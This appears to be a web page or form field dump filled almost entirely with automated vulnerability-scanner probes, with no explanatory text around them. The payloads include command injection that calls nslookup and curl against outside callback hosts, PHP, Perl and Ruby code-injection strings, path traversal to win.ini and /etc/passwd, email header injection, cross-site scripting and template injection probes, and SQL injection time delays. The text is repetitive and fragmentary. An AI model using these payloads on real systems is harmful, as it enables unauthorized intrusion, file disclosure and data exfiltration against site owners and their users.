".gethostbyname(lc("hites"."czbuzadva79f8.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(68).chr(101).chr(66)."

Mr.

../../../../../../../../../../../../../../windows/win.ini


Mr.

1

Mr.


Mr.

1

Mr.

`(nslookup -q=cname hitdyqqkzrhqe64813.bxss.me||curl hitdyqqkzrhqe64813.bxss.me)`


Mr.

1

Mr.

1


Mr.

1

Mr.

!(()&&!|*|*|

Mr.

1


Mr.

'.gethostbyname(lc('hitrh'.'qzwmwqtj805e5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(84).chr(108).chr(89).'

Mr.

|(nslookup -q=cname hitzybmewremcb452b.bxss.me||curl hitzybmewremcb452b.bxss.me)

Mr.

1

Mr.

&(nslookup -q=cname hithwwmjnhogl5c164.bxss.me||curl hithwwmjnhogl5c164.bxss.me)&'\"`0&(nslookup -q=cname hithwwmjnhogl5c164.bxss.me||curl hithwwmjnhogl5c164.bxss.me)&`'

Mr.

".gethostbyname(lc("hitqq"."bhjxupssc168e.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(84).chr(98).chr(87)."

Mr.

1


Mr.

1

Mr.

1

'.print(md5(31337)).'

1


'.print(md5(31337)).'

1

Mr.

1


Mr.

1

Mr.

&nslookup -q=cname hitzfkknhothi3db79.bxss.me&'\"`0&nslookup -q=cname hitzfkknhothi3db79.bxss.me&`'


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

${@print(md5(31337))}\

1


${@print(md5(31337))}\

1

Mr.

'.gethostbyname(lc('hitwy'.'gjgodztwff680.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(70).chr(118).chr(90).'


Mr.

1

Mr.

$(nslookup -q=cname hitoidbfsfsoz4951c.bxss.me||curl hitoidbfsfsoz4951c.bxss.me)


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

${@print(md5(31337))}

1


${@print(md5(31337))}

1

Mr.

Mr.

1


Mr.

1

Mr.


Mr.

1

Mr."||sleep(27*1000)*zzysxa||"

1

Mr.

1


Mr.

1

";print(md5(31337));$a="

1


";print(md5(31337));$a="

1

Mr.

1


Mr.

1

Mr.'||sleep(27*1000)*pzhybi||'

1


Mr.'||sleep(27*1000)*pzhybi||'

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.


Mr.

1

Mr.

(nslookup -q=cname hittbanynvdbbb0d8d.bxss.me||curl hittbanynvdbbb0d8d.bxss.me))


Mr.

1

Mr.


Mr.

1

';print(md5(31337));$a='

1

Mr.

|echo yjvprl$()\ dpgguk\nz^xyu||a #' |echo yjvprl$()\ dpgguk\nz^xyu||a #|" |echo yjvprl$()\ dpgguk\nz^xyu||a #

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.


Mr.

1

Mr."&&sleep(27*1000)*kzuoxh&&"

1

Mr.

1


Mr.

1

".gethostbyname(lc("hitny"."sohpanfv3978c.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(83).chr(110).chr(87)."

1

Mr.

1


Mr.

1

Mr.

&echo ruaaoz$()\ hnmuet\nz^xyu||a #' &echo ruaaoz$()\ hnmuet\nz^xyu||a #|" &echo ruaaoz$()\ hnmuet\nz^xyu||a #


Mr.

1

Mr.

1


Mr.

1

'.gethostbyname(lc('hitjm'.'dygusmuc47a67.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(79).chr(102).chr(78).'

1


'.gethostbyname(lc('hitjm'.'dygusmuc47a67.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(79).chr(102).chr(78).'

1

Mr.

1

Mr.

echo jigmwp$()\ pqwpwm\nz^xyu||a #' &echo jigmwp$()\ pqwpwm\nz^xyu||a #|" &echo jigmwp$()\ pqwpwm\nz^xyu||a #


Mr.

1

Mr.'&&sleep(27*1000)*zfytzj&&'

1


Mr.'&&sleep(27*1000)*zfytzj&&'

1

Mr.

1


Mr.

1

Mr.

1

WEB-INF\web.xml

1


WEB-INF\web.xml

1

Mr.

1


Mr.

1

Mr.

1

'"()

1

^(#$!@#$)(()))******

1


^(#$!@#$)(()))******

1

Mr.

1

!(()&&!|*|*|

1


!(()&&!|*|*|

1

Mr.

1

WEB-INF/web.xml

1


WEB-INF/web.xml

1

Mr.

1

1


1

Mr.

1


Mr.

1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1


unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.


Mr.

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

Mr.

1

Mr.


Mr.

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

Mr.

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1


/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

Mr.


Mr.

1

Mr.

1

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

to@example.com>%0d%0abcc:009247.60685-6529.60685.0fa6a.19899.2@bxss.me

Mr.

1


Mr.

1

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1

Mr.

1

Mr.

1

Mr.

to@example.com>%0d%0abcc:009247.60685-6527.60685.0fa6a.19899.2@bxss.me


Mr.

1

Mr.

1

Mr.

/../../../../../../../../../../boot.ini

1


/../../../../../../../../../../boot.ini

1

Mr.

1

../../../../../../../../../../windows/win.ini%00.

1

Mr.

1


Mr.

1

Mr.

1%0abcc:009247.60685-6526.60685.0fa6a.19899.2@bxss.me


Mr.

1

Mr.

1

Mr.

1


Mr.

1

C:\WINDOWS\system32\drivers\etc\hosts

1


C:\WINDOWS\system32\drivers\etc\hosts

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

./Mr.

1

Mr.

1


Mr.

1

../Mr.

1

Mr.

1


Mr.

1

Mr.&n994973=v982972

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

file:///etc/passwd

1


file:///etc/passwd

1

Mr.

1


Mr.

1

Mr.

1

../../../../../../../../../../../../../../windows/win.ini

1

to@example.com>%0d%0abcc:009247.60685-6521.60685.0fa6a.19899.2@bxss.me

1


to@example.com>%0d%0abcc:009247.60685-6521.60685.0fa6a.19899.2@bxss.me

1

Mr.

1

Mr.

1


Mr.

1

../../../../../../../../../../../../../../etc/passwd

1

Mr.

1

Mr.%0abcc:009247.60685-6520.60685.0fa6a.19899.2@bxss.me

1


Mr.%0abcc:009247.60685-6520.60685.0fa6a.19899.2@bxss.me

1

Mr.

1


Mr.

1

;(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)|(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)&(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)

1


;(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)|(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)&(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)

1

Mr.

1


Mr.

1

`(nslookup -q=cname hitdzbsrtkawa95fd5.bxss.me||curl hitdzbsrtkawa95fd5.bxss.me)`

1


`(nslookup -q=cname hitdzbsrtkawa95fd5.bxss.me||curl hitdzbsrtkawa95fd5.bxss.me)`

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

|(nslookup -q=cname hitxnsacncyhu36232.bxss.me||curl hitxnsacncyhu36232.bxss.me)

1

Mr.

1

Mr.

'+response.write(9190780*9142042)+'

Mr.

response.write(9190780*9142042)

&(nslookup -q=cname hitahbgzogprf14bb1.bxss.me||curl hitahbgzogprf14bb1.bxss.me)&'\"`0&(nslookup -q=cname hitahbgzogprf14bb1.bxss.me||curl hitahbgzogprf14bb1.bxss.me)&`'

1


&(nslookup -q=cname hitahbgzogprf14bb1.bxss.me||curl hitahbgzogprf14bb1.bxss.me)&'\"`0&(nslookup -q=cname hitahbgzogprf14bb1.bxss.me||curl hitahbgzogprf14bb1.bxss.me)&`'

1

Mr.

1

&nslookup -q=cname hitmcjjvsogac2e44f.bxss.me&'\"`0&nslookup -q=cname hitmcjjvsogac2e44f.bxss.me&`'

1

Mr.

1


Mr.

bxss.me/t/xss.html?%00

Mr.

1


Mr.

1

Mr.

'+'A'.concat(70-3).concat(22*4).concat(97).concat(67).concat(108).concat(79)+(require'socket'

Socket.gethostbyname('hitkb'+'uqhzweyrd886c.bxss.me.')[3].to_s)+'

Mr.

1

Mr.

1


Mr.

HttP://bxss.me/t/xss.html?%00

Mr.


Mr.

1

$(nslookup -q=cname hitjrlmjspbawafe6b.bxss.me||curl hitjrlmjspbawafe6b.bxss.me)

1

Mr.

bxss.me/t/xss.html?%00

Mr.


Mr.

1

Mr.

1


Mr.

1

(nslookup -q=cname hitenhomuhvzsdb7e9.bxss.me||curl hitenhomuhvzsdb7e9.bxss.me))

1


(nslookup -q=cname hitenhomuhvzsdb7e9.bxss.me||curl hitenhomuhvzsdb7e9.bxss.me))

1

Mr.

Mr.

"+"A".concat(70-3).concat(22*4).concat(105).concat(78).concat(117).concat(69)+(require"socket"

Socket.gethostbyname("hitpe"+"mqhedfol6755e.bxss.me.")[3].to_s)+"


Mr.

1

Mr.

1


Mr.

1

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

1


Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

|echo ecixkc$()\ kopgdx\nz^xyu||a #' |echo ecixkc$()\ kopgdx\nz^xyu||a #|" |echo ecixkc$()\ kopgdx\nz^xyu||a #

1


|echo ecixkc$()\ kopgdx\nz^xyu||a #' |echo ecixkc$()\ kopgdx\nz^xyu||a #|" |echo ecixkc$()\ kopgdx\nz^xyu||a #

1

Mr.

1


Mr.

1

Mr.

&echo njazzj$()\ qkswbw\nz^xyu||a #' &echo njazzj$()\ qkswbw\nz^xyu||a #|" &echo njazzj$()\ qkswbw\nz^xyu||a #

1

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe


Mr.

1

Mr.

1

Mr.

khLvqu4h


Mr.

1

echo gtoonq$()\ wbnlvm\nz^xyu||a #' &echo gtoonq$()\ wbnlvm\nz^xyu||a #|" &echo gtoonq$()\ wbnlvm\nz^xyu||a #

1

"+response.write(9892150*9320948)+"

1


"+response.write(9892150*9320948)+"

1

Mr.

1

'+'A'.concat(70-3).concat(22*4).concat(119).concat(69).concat(122).concat(88)+(require'socket'

1

'+response.write(9892150*9320948)+'

1


'+response.write(9892150*9320948)+'

1

/../../../../../../../../../../windows/system32/BITSADMIN.exe

1

tFPg0amT

1


tFPg0amT

1

"+"A".concat(70-3).concat(22*4).concat(104).concat(82).concat(122).concat(76)+(require"socket"

1

1<InvalidTag

1<InvalidTag>cAZQ(9539)</script>9539

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%75%54%50%78%28%39%33%36%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>cAZQ(9831)</script>

1<InvalidTag>uTPx(9919)</script>9919

1<W4KNQJ>VUXG0[!+!]</W4KNQJ>

1<InvalidTag>uTPx(9549)</script>

1<InvalidTag >cAZQ(9514)</ScRiPt>

1<W1NJLO>WL0FQ[!+!]</W1NJLO>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1<InvalidTag >uTPx(9986)</ScRiPt>

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

1

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

1

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

bfgx1434%C0%BEz1%C0%BCz2a%90bcxhjl1434

bfgx2628%C0%BEz1%C0%BCz2a%90bcxhjl2628

bfg7782%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7782

bfg9084%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9084

19690329

19110268

'"()&%<zzz><InvalidTag >cAZQ(9461)</ScRiPt>

'"()&%<zzz><InvalidTag >uTPx(9852)</ScRiPt>

1'"()&%<zzz><InvalidTag >cAZQ(9793)</ScRiPt>

1'"()&%<zzz><InvalidTag >uTPx(9291)</ScRiPt>

@@G0Wu6

����%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1naI2qKWg')) OR 625=(SELECT 625 FROM PG_SLEEP(15))--

